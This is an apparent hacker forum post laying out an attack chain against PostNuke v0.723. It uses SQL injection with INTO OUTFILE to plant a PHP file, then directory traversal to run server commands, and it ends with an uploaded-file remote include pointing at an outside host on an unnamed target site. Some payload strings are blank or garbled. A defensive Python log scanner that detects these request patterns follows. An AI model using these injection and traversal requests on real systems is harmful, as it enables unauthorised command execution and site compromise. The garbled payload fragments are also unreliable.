The original idea actually came from this..
Requirements:
- PostNuke v0.723, maybe others
- PostNuke user
- MySQL user must have permission to select into outfile (File_priv)
1) Register as a PostNuke user.
2) Log in as the user you just registered. After login change your "Real name" to something like "" or just ""
3) SQL injection in the "Members_List" module.
Select user information into /tmp/theme.php
http://[postnuke site]/modules.php?op=modload&name=Members_List&file=index&letter=[your username]&sortby=uname+into+outfile+'/tmp/theme.php'%23
4) Directory traversal in the $theme variable
Run command on server
http://[postnuke site]/index.php?theme=../../../../../../../../tmp&cmd=[command]
Then I found a website that allows uploads.
I uploaded a file that contained
and somehow it went through...
Then I looked for the folder where the file was stored, using Properties...
I found it at
www.target.com/image/avatar/public/file.jpg
Then I appended to it
www.target.com/image/avatar/public/file.jpg=id
but the file can also work,
then the inject is
www.target.com/image/avatar/public/file.jpg?ijoo=http::/injectmu.com..
(geocities.com/ijookeren)
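
For spotting the three request patterns described above in a web server access log, here is an added example (not part of the original post, and not PostNuke code). The sort-column allowlist, the finding labels and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: sort columns the member list legitimately offers; adjust per site.
ALLOWED_SORTBY = {"uname", "name", "email", "url"}
THEME_NAME = re.compile(r"^[A-Za-z0-9_-]+$")      # a theme is a bare directory name
IMAGE_PATH = re.compile(r"\.(?:jpe?g|gif|png)$", re.I)
URL_VALUE = re.compile(r"^(?:https?|ftp):", re.I)
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def check_request(target):
    """Return finding labels for one request target (path plus query string)."""
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)
    findings = []
    # sortby must be one of the known column names, nothing appended to it
    if "Members_List" in params.get("name", []):
        if any(v.lower() not in ALLOWED_SORTBY for v in params.get("sortby", [])):
            findings.append("sortby-not-allowlisted")
    # theme must never contain path separators or dots
    if any(not THEME_NAME.match(v) for v in params.get("theme", [])):
        findings.append("theme-not-bare-name")
    # a static image should not be requested with a URL as a parameter value
    if IMAGE_PATH.search(parts.path):
        if any(URL_VALUE.match(v) for vals in params.values() for v in vals):
            findings.append("url-parameter-on-image")
    return findings

def scan(log_text):
    """Return (line_number, findings) for every log line with a finding."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), 1):
        match = REQUEST.search(line)
        findings = check_request(match.group(1)) if match else []
        if findings:
            hits.append((number, findings))
    return hits

# Constructed access-log lines (documentation addresses, not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /modules.php?op=modload&name=Members_List&file=index&letter=A&sortby=uname HTTP/1.1" 200 512
192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET /modules.php?op=modload&name=Members_List&file=index&letter=bob&sortby=uname+into+outfile+'/tmp/theme.php'%23 HTTP/1.1" 200 512
192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?theme=../../../../../../../../tmp HTTP/1.1" 200 512
192.0.2.11 - - [01/Jan/2024:10:01:00 +0000] "GET /index.php?theme=ExtraLite HTTP/1.1" 200 512
192.0.2.12 - - [01/Jan/2024:10:02:00 +0000] "GET /image/avatar/public/file.jpg?ijoo=http://example.invalid/ HTTP/1.1" 200 512
"""

if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(number, findings)
```

The same two rules (allowlisted sort column, bare theme name) are what the application itself should enforce before using either parameter.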